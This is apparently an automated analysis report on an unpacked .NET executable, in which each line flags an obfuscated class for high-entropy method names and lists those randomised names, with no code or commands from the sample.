Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, CIkHNUCDJFIEvgYS44O.cs	High entropy of concatenated method names: 'KDWHLr7OYks', 'FmoC0RDhYc', 'sXoHL92D7h6', 'kJEtceH5eDDco2REcYE6', 'C9rJjSH56KQHRhKyAGqX', 'qsMYcOH5IXDf1bXai3sh', 'zYoskAH5Q7wJnxMjCZmk', 'elQTHcH5SJJub3D91iEw', 'JjvMlpH5Ym9P6NQEMn4H', 'Elw82qH5ZRfSyvwuq9SB'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, zLGDoan3hJoAVAlt9jr.cs	High entropy of concatenated method names: 'GhGHLX6rga6', 'CtmnEWJENT', 'MpVnMN1r9c', 'Q6wnD2NPma', 'yCwhJNHhXdGDubBFREwu', 'cu1XTAHh62CSocs5WdI5', 'u546SNHhIhYujNLq7cjv', 'iQlmJJHhel9GZ2liO8YF', 'DvUv2CHhQxhoNklSWtfL', 'NfaiKGHhSKZY2fonWCEP'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, hPhnv78PegBjIQt0fmi.cs	High entropy of concatenated method names: 'VHHstuHAAyxn4qrIEHGe', 'nxVMjvHAvIZIoRp8DgH9', 'b0wVT4HAoA0YPGYudr6P', 'kAHnw0HAnaKCJwK26d6U', 'Tqdjw4GILe', 'cWj8d7HAdhixjM4T5U6Z', 'OQGmCCHAV3ZPrxeExyHZ', 'FjOr5kHA58aga4yUcPio', 'lXmj2MHAJyNNgLJ26QoU', 'T31DTmHA3bUoWbDIkRvE'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, i76fD4JSoQgA41G4eD.cs	High entropy of concatenated method names: 'IndexOf', 'Insert', 'RemoveAt', 'get_Item', 'set_Item', 'method_2', 'Add', 'Clear', 'Contains', 'Psd1kO4U3'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, UH8Njf2Zcu37XU2VCp7.cs	High entropy of concatenated method names: 'kVw25WBRrD', 'zvh2d4fZGm', 'xdvTY5HQ73qxGKQ7VHd5', 'fwDUpYHQYI6Wd5pto0rT', 'lvUbOsHQZgxP20CI0xfR', 'WEf2ECTQtg', 'PGiSc6HQoqT84b4ueUXL', 'rw4N2wHQF2rKlW0l3k6S', 'I7mk3nHQvV948cY7oQ8m', 'gZFFZGHQAHWlXsLPvqd6'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, NTC0pttg1HTIU4MADSr.cs	High entropy of concatenated method names: 'g7FtBe29N1', 'RGZty8Lga7', 'P8jtK4VopL', 'z2xtG8RrKO', 'AHWtPTs1gj', 'DUJtX6ebtS', 'gF8t6hoVoE', 'U22tI7Icyx', 'Dispose', 'A4DQM1HilpXNhT4hu5Q1'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, OoXUWjFAigHsfr4KHOT.cs	High entropy of concatenated method names: 'q13', 'Sw1', 'method_0', 'qEUF4pLrkN', 'n2oFViATUy', 'a3jF5BdNrD', 's6lFd4KrvL', 'miVFJ1j3kD', 'QtpF3MVbVT', 'IjXulRH05kd6OdFBCPNl'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, j2DDjw4Z2yOo2LE8QoW.cs	High entropy of concatenated method names: 'OLO4fb5vFI', 'lSi4FVpZlQ', 'JRM4vKYPNk', 'beS4oCA0k2', 'g5t4AbEufQ', 'EUa4nhBqFd', 'V4i44uMK1J', 'eEX4VE7CcS', 'i0045ZfFv9', 'jQh4d0hx5m'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, MQd9yfP0Vqn0hVB1n6F.cs	High entropy of concatenated method names: 'HbXPhwnLAy', 'L35PsG7PLg', 'SW8PtpHUiZ', 'qgqPuilW3A', 'O6pPinXeDM', 'AedOo4HJ5O6hAWklxH3m', 'J35UtyHJ4ft4qNv6jjLN', 'CxBd8uHJVZbW7X58UEJB', 'xedAhTHJdpMOVmDLvNED', 'HhhZtZHJJfNtGR80RY6C'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, VG5T9Va4AuW3xal8oFH.cs	High entropy of concatenated method names: 'q64', 'P9X', 'rUIHpjWPj25', 'vmethod_0', 'vOIHLUwjAT7', 'imethod_0', 'BiO6ROHZ3D3nHC8aJaRf', 'jZuSJaHZ1o5GStwyTTO4', 'zX4FWVHZEg9RXlTYqw0w', 'cSf1EjHZM4pcpWwIKOBQ'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, rrp7LICnCChcdkPPfCl.cs	High entropy of concatenated method names: 'N2N', 'MBSHLWOmN8Y', 'xAoCVApSNv', 'aweHLBPb43n', 'tAaT03H5WKl8LfhMWuuo', 'vgGFLeH5Bw5FSNTvWakv', 'JWgQEwH5gXIJy72ntPQq', 'cbscQ5H5jSkm956jSBWX', 'rEAaKlH5roeoAAS83HJi', 'vaSfakH59QnJT092RyIM'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, a7bpikNgn4Nbf8Mg26Q.cs	High entropy of concatenated method names: 'P9X', 'nfRHpGVTK9M', 'vmethod_0', 'imethod_0', 'PGZxWeHfGdujLNOKSDq3', 'SuApa9Hfkkk0f3v6Nlqq', 'tNojCBHfK5Y7sTZX0LlA', 'EtksnwHfPJH6IrwAwPWr', 'So2NxYHfX5ORWY5M7wlx', 'Q5ZtIlHf6ny42tu5cAJt'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, OCqjyLL15C4FV1MGkXe.cs	High entropy of concatenated method names: 'x1BLt8y3D9', 'eFOjjLHv84huHRJYuekl', 'QwxwfYHvRyoq5a15QQcg', 'n4YsgrHvlRbCDfJ2kSyJ', 'MepaNQHvqx6quDFO8DWN', 'P9X', 'vmethod_0', 'QR8HpekUjrR', 'imethod_0', 'QQEaBUHvN1PGDxq12W1L'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, vfsct6p63j9aKc4jDs8.cs	High entropy of concatenated method names: 'VZq', 'KZ3', 'XA4', 'imethod_0', 'e23', 'UxLHLxvSTDa', 'vTDHpHK1kwq', 'CPrF4lHYyTIXlWN6QC71', 'WMuBJxHYCFUUQvv5KS0c', 'zI3QILHYkH3CN3m4MAGk'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, rHNSY6LrEFiBsDXdG6M.cs	High entropy of concatenated method names: 'CLRLCqNDni', 'xN0dkIHFvRSZIUZ4nPwr', 'SeKB1kHFf3qWoVLo6Qen', 'cS2hriHFFOhZZqZimbgX', 'vTcSF0HFo7otJop9DLR5', 'GtlLTb3SHh', 'VSsOgwHFQjPMJgQ7A8ju', 'hjJpWUHFSdoLUXTWpmHE', 'luUoILHFYcIqSuqoq9Ex', 'MM5P4SHFITnISA0toPuy'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, QZjQAHHIWZrHZg7HbA2.cs	High entropy of concatenated method names: 'Co7', 'd2B', 'hGPHQtJVo0', 'LugU7BHeY3NVO9onAuly', 'RagXfZHeQNUIiTXsaWmR', 'n3YMwuHeS5wVPjQ8DKfp', 'Vc7iXAHeZdB6OsrhqK55'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, luFxxouOH7bhXISKGqP.cs	High entropy of concatenated method names: 'zrfupTdJUi', 'CKsuac6C8N', 'IAxss1Hi1CvBSyn931rs', 'SCdBckHiEUvC6rrMhIU9', 'CRmxjiHiM9SskcluZhh0', 'gHMSZBHiDYDjmLANIrPC', 'M8dBRgHimLkVEfTehLkF', 'QBhu2onSPi', 'Ei6MARHi5AnhPG9cQ2qe', 'XTeOE7HidwvAKpVJ7ptp'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, L6outxhIpKyrDwnFJAa.cs	High entropy of concatenated method names: 'lrQHL6Cb3BX', 'CJMHUkO9Qgq', 'yQ8', 'K9m', 'nOr32cHtvYMdjteiKiyp', 'Pl15BGHtfsCqcfN7s8WZ', 'AwvQcTHtFJ7w7gN0a50b', 'QIJtrSHtoNgGVdlH8bNV'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, YCf6gg2aqBfu5yuM2Wg.cs	High entropy of concatenated method names: 'Fw72NLFrmp', 'Pgq2LpL45k', 'KJ028WaqKX', 'OF12RVtaEW', 'YPDCZeHQRKiZWPKbKoBI', 'QUV1vPHQLQMSN2jPtiAu', 'kLM1uXHQ8BBibnf0cHYT', 'vvQlqMHQlLtePqgDkB6x', 'P82i3eHQqAuc3CLIdGVB', 'BB6NZYHQgGybcyrnSDQx'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, fAIFZLWlSJKNXGw9YVs.cs	High entropy of concatenated method names: 'Dispose', 'LPmWgkKJEU', 'NSiWjnHatB', 'wIxWW7Nx8b', 'fAe9L9HAzcLfF24ltKZG', 'vGSAYdHnOBv12VAFAPtA', 'zlxg9UHnHE25UuCu9y2a', 'cQbgn1Hn2lFy2Bwb6HEU', 'Dcm6a6HnxXfiWIthgSRE', 'a2HAfWHnp7FHe4RTmNaA'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, Sd7wP97kJrXCDUD7TlA.cs	High entropy of concatenated method names: 'O9hfj2yxMg', 'SvjSokHm3DTO1ZgPbdK9', 'u8Gkp5Hmdkj3efjSabUx', 'xRaa4mHmJt6GewIkgvuj', 'WBfQBEHm1b7IXfdYtbEg', 'kt5', 'XKy7GuAikI', 'ReadByte', 'get_CanRead', 'get_CanSeek'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, CxppKd82fbVVXGf7SSj.cs	High entropy of concatenated method names: 'UUC8pYYNSi', 'JA08ac2Us8', 'Luq8Ugf0Cs', 'kjY8NChZA9', 'wHW8L8A6FS', 'YA688tc7oG', 'S7g8RFXurq', 'nKt8lirtTC', 'P7V8qsqOAu', 'Pyg8gk5k3q'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, kb5TGGyhLi4cShaNPDw.cs	High entropy of concatenated method names: 'm1I', 'G4q', 'w29', 'BnRHLg7TqlA', 'MKvHp1Ela91', 'PGVxXlHVKqbDFAccfiJQ', 'GKSLIaHVGuL5WCbLyBLG', 'C7TsQhHVPt8wGdqpyHXM', 'SUb7U1HVXgIEiBjkNSIR', 'DijIniHV6Yh9uu4Kawp8'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, MQj1Y4tZQkf5RS7q5al.cs	High entropy of concatenated method names: 'fGLtfQWEyR', 'TWytFSUIFW', 'KEOtv1Hos0', 'nUjtoc6uNf', 'Dispose', 'NqyeWeHirkZGPunHuKZx', 'AwwfBJHi9UOH9Dc3e4Pg', 'Ld1rNJHiTvuLwi8c20uX', 'wuLfFKHiykmUMYwbIjGf', 'z059GiHiCasHxKO6EvDV'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, YMqXwbn8pdY2u3Prlq1.cs	High entropy of concatenated method names: 'rbenXjZTLa', 'sLrperHhgdOgOrNSq1cJ', 'QvOvxxHhl2HvK552EeP2', 'arUijwHhqQNa9k5nBt1M', 'KIoXI7Hhjp9Sd3gbMCxB', 'HesChHHhWdWG719MaIA0', 'IPy', 'method_0', 'method_1', 'method_2'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, jjVKU4Qw3bDwwV7jJhX.cs	High entropy of concatenated method names: 'QWBSOQl7p6', 'TD2SHOuTTg', 'gSuS2pL5RJ', 'qS6Sx118FC', 'qwaSpVjj4q', 'Cd8SayUh8g', 'PpBeI4HE313w1vCNZdU4', 'ER4439HEdCN0H1id6uXM', 'JrAMG5HEJ6MWjc81KZnt', 'eI1bXxHE1J0kX0HU9aJn'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, Ef2AOyCjCFD34WWvJG9.cs	High entropy of concatenated method names: 'ci2CCw2Tpa', 'PWZm87HVhJPP6XLYEuOa', 'VaTHyRHVsWqy2w69Y8mv', 't1lgLRHV0JnKQfV7J7BS', 'ClpIbiHVcMmUjyiK7iQU', 'WKNydXHVtKGLeqeVfRVZ', 'GSGCBJhfcU', 'fr2M4jHVE6sWrIhOY9vm', 'fIY5v9HV3rMARSBlmPCJ', 'FgFTEnHV1mMwcI40rxOu'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, N7i0OyUXuB4Cu3kEAk4.cs	High entropy of concatenated method names: 'MUtUZLbc9D', 'JY3Tg9H7fejRJq5FM0Yu', 'RAsBsXH7Z1W97Ce7RU2X', 'LcKrerH77BddvvtSvhJI', 'E94', 'P9X', 'vmethod_0', 'L41HpCrKcnF', 'kD6HL8KmJD5', 'imethod_0'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, r1rL5kbTn3F82TuxB81.cs	High entropy of concatenated method names: 'gDQbSVgg4L', 'rZubYWvxTp', 'u7AbZlyjJB', 'T3Db7f0kWU', 'WWbbfhWSVK', 'GiibFQkAcp', 'ECJbvAVMDX', 'sW2bo4sNBj', 'RShbAL0l8Z', 's2mbnH4fWt'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, tHsdWQa8DdENaUjHo25.cs	High entropy of concatenated method names: 'Rpx', 'KZ3', 'imethod_0', 'vmethod_0', 'VZFHLaLJuXR', 'vTDHpHK1kwq', 'uYkhK5HZlVQd9XKMrhdj', 'MFQjf3HZqT3pYVPTMi4f', 'vFCdG1HZgARlSwDeIZyQ', 'ClBYqkHZjq8T0JEBY7hK'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, UyiZJVSZPQKpxb1iEE6.cs	High entropy of concatenated method names: 'DB4', 'method_0', 'method_1', 'method_2', 'method_3', 'method_4', 'method_5', 'A47', 'fC4', 'aK3'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, m89FWlKgqYTtySSY3wX.cs	High entropy of concatenated method names: 'yXjPH2VV7j', 's5psRMHJCe6TDQLt6n0V', 'dkiYNwHJTNqOKoiVCCNK', 'QRGCP3HJyN6NRuHfIJm0', 'YPU3CwHJkKeGDPMPsXRJ', 'dubKWVlW32', 'vYWKBHZLl9', 'VwLKrmZe61', 'drAK9QcqGs', 'CyVKTx18Q2'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, XEYIAVfmyukLPf2hfMN.cs	High entropy of concatenated method names: 'stUfc8UrVD', 'k6r', 'ueK', 'QH3', 'y3pfhAZIVc', 'Flush', 'yOCfsJrH29', 'k0yfthGPFa', 'Write', 'qxrfuYBWsi'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, yro7gXaBYDHX29h0VYW.cs	High entropy of concatenated method names: 'qc7aeopRZC', 'DSsaQu6GcU', 'NNnaSYTO32', 'z7uoEyHZFs5dpYLXUQgy', 'eihpngHZvQOAHpnAgZyM', 'tPeXfqHZ7kjC7C1fV96E', 'WhfH5EHZfe3KeC9QMNeY', 'sQIaPSjImZ', 'cxgaXfImpW', 'YvNjmAHZSEw8npaXwf1U'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, wVJdFuYwN8WsM28SGx7.cs	High entropy of concatenated method names: 'nykZOJKM4l', 'qZJZHmIR50', 'Yd7', 'qXbZ2k6NCj', 'if5Zx3DFTI', 'uW2ZpG09g1', 'q1lZaEya1V', 'BfcRE1HD0fGGgZpj11Bg', 's8g4TSHDDUD2wZyoYrOY', 'cnNOr1HDmPEHMY1oRopq'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, hYBLI52mxbyWG0Fkc2U.cs	High entropy of concatenated method names: 'uJAxNemH0W', 'JZEvZfHQcGUcET6dlgg3', 'aExosfHQhAU8aMiE7Ecp', 'IfrdDlHQs8rQsqBveZIg', 'BoQA80HQmWCn5iLOI96A', 'lpayHHHQ0GyNaXTwINxH', 'gI9R6JHQtVi126w4PdAr', 'cWTxO1FTIs', 'W0Nx2wjlnN', 'xepxxuKtUx'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, KegdKZPRnHmlN2Y8dwK.cs	High entropy of concatenated method names: 'MoQPZZWkUJ', 'AyNPq2Y9aq', 'mMHPgXEMrG', 'O02Pj7HGsP', 'C5yPWGchQk', 'CpvPBsIfUH', 'Bx3PrL1yBq', 'N8rP9LkKgI', 'alyPTlL4Um', 'SrjPyCmNDZ'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, NCqEMFZL7ttKE6n1Uki.cs	High entropy of concatenated method names: 'l9gZRAoRxf', 'gfvZluhIJG', 'method_0', 'method_1', 'I27', 'c6a', 'C5p', 'hm3Zq2W4o8', 'method_2', 'uc7'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, C7aSrlSVN3Omp1Amp6c.cs	High entropy of concatenated method names: 'HKVSdLJn0a', 't9wSJ9mLJs', 'WwXS3ocIro', 'XMUS1ouS6n', 'k11SEW5Acw', 'r0ISMyNlnN', 'i2NSDEM7GO', 'ftVSm5jVPw', 'h0rS0e2fCH', 'z4BScNbUu7'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, Qix8payQA0jPRrO1Y8p.cs	High entropy of concatenated method names: 'KDOyouqBf3', 'EDOfF7HVafdwsbPNYeKn', 'VQo5dqHVx8Twf04mmbya', 'XDG6KHHVprN9iROpacl6', 'HE5XS5HVU9TihJsOkwSk', 'PQsyY9EyhO', 'TjIyZyKAeC', 'BGSy7cTyyt', 'LK5jibHVOMfVRuwWv6YP', 'PpSCZQH4wVZGUxAvIahu'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, BIRNaXa0pyS2JCWQFit.cs	High entropy of concatenated method names: 'dDtaiIClkt', 'g6WabSas2X', 'Smjawc1Whw', 'H5oazOtsUF', 'qlNUONwePu', 'mvRUHRvwDZ', 'TnWU2w6XNB', 'i7U33xH78ODqr8nZ1CQF', 'Ut5OvcH7N7Ve8nwIq4wf', 'Ld3mk0H7LcY5Nkh9ZIe1'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, Dh33T9VvLYLf94UQ9AR.cs	High entropy of concatenated method names: 'hEEZ7cHsDhwaM3InhLfR', 'ih0ZXiHsmceCEIAgqLdW', 'miD25uHsE914Ccdg1Yy8', 'HKiMytHsM44Xs0sG6Sv3', 'SyHGiXHsJeUpIk2P0SxQ', 'MrGFc2Hs3RP6Qc9KDqq6', 'P9KoenHs597UkmnXqoFr', 'kBBm40Hsdx6GljU7W5sg'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, rdBYACY335wpLuOuTFx.cs	High entropy of concatenated method names: 'bjtYEH9J0I', 'C0TYM4gBat', 'GTJYDQk5xH', 'CULYmCSD9M', 'l6XY0Fbnqw', 'S5Bn8gHDoWvO140KHYt3', 'mAKTj0HDAufiP8pbtEt2', 'vLis0eHDnVII3oHhBLcY', 'sw5rCOHDFovdeI5PDwRX', 'AARBkBHDvxyu31b0W9WO'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, YPWYI9HwsJEINU58jeM.cs	High entropy of concatenated method names: 'KZ3', 'fW4', 'imethod_0', 'U7v', 'WkvHLHoFIq8', 'vTDHpHK1kwq', 't6RlXkHewdAf36uMPyWK', 'Yi9OAyHezsn7Xtc3vgvp', 'cLtImqHQOF4GOZOT6ym6', 'zWvvdgHQHk5HiXEhhl5W'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, EPMspVynH2B4gDu0Umb.cs	High entropy of concatenated method names: 'W3Fy1darGk', 'SnGyEg4Xwc', 'jYCyMG5Q7I', 'oo9bkIHVWqk3qaMAKPfE', 'DZBgS7HVBpuVsnZSmjEU', 'wRHFclHVgVKxkbM0Wgiy', 'BeUiwlHVjqYvPJYHbZnc', 'xKWyVTjMhS', 'Wv2y5XFJIK', 'cEwydt1XDa'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, Mx5jrE9Dv7HWFBNG5m.cs	High entropy of concatenated method names: 'iJnFQioWi', 'SS9UqAHISt9h90WMgABl', 'yub83rHIYc17WlbQ4YnT', 'CWoRWZHIexoNIRwIlqBa', 'tlTbycHIQ2Vj47lsxcTl', 'hloyayxTQ', 'koFCOfGIu', 'qMck3lMqo', 'TJdKASW9M', 'VajGWpJ99'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, plL30BWGnoj9CjpuNR7.cs	High entropy of concatenated method names: 'fc5ygQxRiZ', 'preyjew2J7', 'f7qSGwH41vNQMJ5KolYk', 'RfNc4GH4JRlNnn5hLRev', 'vvPxSMH43hWTDnIjGWrj', 'BQgLoNH4EKCa5BtSmcHQ', 'IdsniNH4MnvyNhpte1uL', 'DUlyyTtx47', 'gNH9ClH4m68GJ1XHBj3t', 'zfB842H40HkET3Kp9nQR'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, UOGrmKFmIYuJHObVGSI.cs	High entropy of concatenated method names: 'zHVlKcHcOrtdOvHJXf2T', 'lMD5JWH0w3rUotVL9xSS', 'Ywx6rDH0zXTl2DiKcti5', 'iddFc6MF1Y', 'Mh9', 'method_0', 'bllFhGhkUi', 'yijFsvBBs5', 'kovFtoQyns', 'iPVFuMdiVj'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, Tqt5M2NyePVGYZYlZS5.cs	High entropy of concatenated method names: 'FwvNQmC1gR', 'BZwdD9Hfdi3xWgSArrhh', 'VFxQlTHfJYIwalSUBYhF', 'R25iMFHfV2OeDxOTRV9U', 'JbNPINHf5Sjv4RM7LKBp', 'RKFEUcHf3jfDaGM7xOSJ', 'VgfNkDoQwd', 'jxINK0nAyc', 'PYyNGtP9n6', 'buONPrwpOg'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, iSjaOLLKPfRDewOasZn.cs	High entropy of concatenated method names: 'CATLPV9g6r', 'EYrCK0HFVCGvJdvRqIHM', 'js9EbxHF5d7xP5ca4tuR', 'bQ6uh5HFdcWhV7gp9dFV', 'D72iSpHFJttrAgMjeeDS', 'rqCKiyHFnk1VUiih4nJ4', 'WVAhHyHF4sHT9qcGkQXR', 'I3LIW1HF39oWAIanWVgN'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, mJ7igxxm23x2OUDOWNG.cs	High entropy of concatenated method names: 'D84pxN13tJ', 'pFpppTKEyZ', 'SE2pa8gfUg', 'XhT2esHSwY5kwREysjBq', 'A6egl5HSi1JCZwvMccP8', 'GShLYLHSbh2nb9jQkegb', 'fGsplPfeBN', 'EwmF8EHY2TLrSGsNB0qC', 'O4RMVLHYOSM9k1it6Yq4', 'D3RrW3HYHGtpLpunqlEI'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, OWJKhnpyowAphB6akvt.cs	High entropy of concatenated method names: 'KZ3', 'imethod_0', 'L3I', 'MvjHL2mdoZy', 'vTDHpHK1kwq', 'CcbIfZHYjHK17TEnICPa', 'nQXX97HYWDo58qtTbhQN', 'tp3U9EHYBkN05m0n22Uc', 'yj3roxHYro88oTJehEr3', 'wDU4UlHY9VfGKSBB3mAR'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, hwblA2kBDSZW2uY75W5.cs	High entropy of concatenated method names: 'S5oZidHdg642PPck2f05', 'kRg18gHdj16eILJF60iD', 'yKtBrrHdWSrPK9Degxt0', 'shxpPhHdlMWavr2Y4vgl', 'P7Wl0OHdqcxHklOEJjYS', 'method_0', 'method_1', 'z1Zk90nPgB', 'BoxkTVd5Hm', 'mw9kyU7rBO'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, cruYcl4urNHsj18q3kx.cs	High entropy of concatenated method names: 'qcQ4b8i0kj', 'BlW4wTE9sg', 'K5J4zTZBM0', 'pYDVOn3ymR', 'yN4VHPs39r', 'pIyV28uxH0', 'WilVxjUnlN', 'oCTVpxF7yi', 'uTjVauOVxq', 'xPpVUcA59P'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, exM9PHhAxTpBcUDmy1B.cs	High entropy of concatenated method names: 'C39HLImqe39', 'cdQHU69BTtp', 'I22UK8HulaL4u511Wt65', 'o90AtQHu8fQk1CIJ97kZ', 'dLGGjZHuRQo3rKJGUkFd', 'Nx7QbQHuqPC01SvoMo7P', 'GXiWicHuBlV5AHjuU0mZ', 'XqO7MgHujyNwvhVgwLOk', 'I3D8GtHuWTAMd7TGAb8r', 'imethod_0'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, PO3HXuLetEHg8PHtv52.cs	High entropy of concatenated method names: 'YALLSV1Xv7', 'o4ULYyByDY', 'mgaLZSGkSP', 'Up1L7ydb16', 'KblLfArb4t', 'Nh9LFSGnLe', 'MHhmTBHFc181fT548mKb', 'hcOcmOHFhYS3IaMvmkE8', 'ewBEHUHFsRkGWiqkuO0I', 'iqq800HFtnTGduiMMFMZ'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, s5wkfYb46Eorf0no8kh.cs	High entropy of concatenated method names: 'w1aHU7e9P6J', 'PKQHUfkJwXu', 'OSDHUF1usDM', 'BPnHUvHi9ZQ', 'QITHUoB4Yls', 'Dd5HUA0OSg1', 'SXLHUnHW1IA', 'zYqwaj8gPJ', 'tktHU4sFoKe', 'MaeHUVMx9EG'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, Dufp9HfvTfgH65WwmsD.cs	High entropy of concatenated method names: 'Close', 'qL6', 'aR5fAy5oOa', 'gMwfnoagJZ', 'GFgf49rtu9', 'Write', 'get_CanRead', 'get_CanSeek', 'get_CanWrite', 'get_Length'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, kgrkpms74mdnP6fu234.cs	High entropy of concatenated method names: 'jZNsFNGJSb', 'CmIsvGhuOl', 'yQ1soPqHi1', 'x9msAbxqsy', 'RY1sn57bKp', 'LJKs4CEl9g', 'L4QsV0XWDl', 'ONys5NRaUE', 'jPGsdN9G1K', 'VtksJNqGiC'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, RsmSbr6PgpqK6du6OuZ.cs	High entropy of concatenated method names: 'nwi66iILkM', 'zlZ6IqZhE5', 'Nmb6ea2OBN', 'kKx6QPrrHo', 'b7f6S2cWcF', 'FineDxH3dgKih6VI7cej', 'axEulTH3VNQykDSmqdDb', 'o7YUuyH35EGE7c0lKly4', 'zacL6RH3JtxmFOTIwVD4', 'HkXfbpH33XjrGhubpoeM'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, sthVylNZxK2pLlk4lwj.cs	High entropy of concatenated method names: 'tw4NfSVgee', 'AD2NFekNQZ', 'CukPJxHfDoQgHwqYXgOn', 'jZ2lAeHfEnK3DTrdneAA', 'WQ02maHfMdyyy9tgTvBw', 'UZxHeEHfm0iube2ULAeR', 'inxBFcHf0s3Yrasbq0eP', 'Rehe70Hfcy5clloy8JP2', 'TgOfSBHfhavX211PqYSK', 'cHk7h9Hfs0sIqtsTKBHw'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, xX0DqmN5PgvUGXw20Er.cs	High entropy of concatenated method names: 'fugNtjStTP', 'Ar6NuQJqfF', 'qIh4otHFLRlwYDrT4Ube', 'O9br6QHFUUAFd3XB14FW', 'XIv0QHHFNJGYFDM9ZCdv', 'bA2eOpHF8K6j3cueuLrd', 'VdlNJ5c3Nb', 'O58N3JFDbr', 'jq5N1dxKrC', 'OC0NE9JpC7'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, nTOR0QkaCsrPIbuxsDc.cs	High entropy of concatenated method names: 'method_0', 'method_1', 'K47', 'PGAkNAdqhk', 'vmethod_0', 'eUdkL6ThB8', 'vfPHLkWhTqO', 'dBjlTiH5MN6wUWuaGP56', 'iLR5c4H51U0NBkL3TBH8', 'u5j5YQH5EgYrSqJ87cVI'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, J7EMJcXJsUD5YajAk9q.cs	High entropy of concatenated method names: 'a99', 'yzL', 'method_0', 'method_1', 'x77', 'AV4X1ejO3U', 'oBqXEF738P', 'Dispose', 'D31', 'wNK'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, DmcWucu9ZjDuseHj6np.cs	High entropy of concatenated method names: 'PTW4itHbNuyXq4tcvXy7', 'JNq7m7HbL4jtJZ6fh4ON', 'dQ5ihAFoT0', 't0DjYNHbqSlTpG699GkB', 'egQMCdHbgEHkvPL2phYX', 'p0gmYOHbjZr4D8W3og5T', 'fea3LTHbWWMyu5TYHL7Q', 'Wu8VcjHbBiZkmpFHtFaW', 'yI7HgeHbr0AKFPqfihHa', 'UG9bi1Hb9RykODdjek5y'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, rGismKhZyjVWHY5iK6X.cs	High entropy of concatenated method names: 'method_0', 'h59', 'R73', 'KIFhfyGnYn', 'pxxXjDHtnppyinhIcGt3', 'EflUVyHt4iIxGkMKtsTd', 'RZgr7VHtV6pSTfpj7KZk', 'Lu1ukiHt5yJ4VGGIV5Md', 'I3ubvAHtdFuceol6ifAs', 'Tj7VEtHtJFS9YlouuCL1'
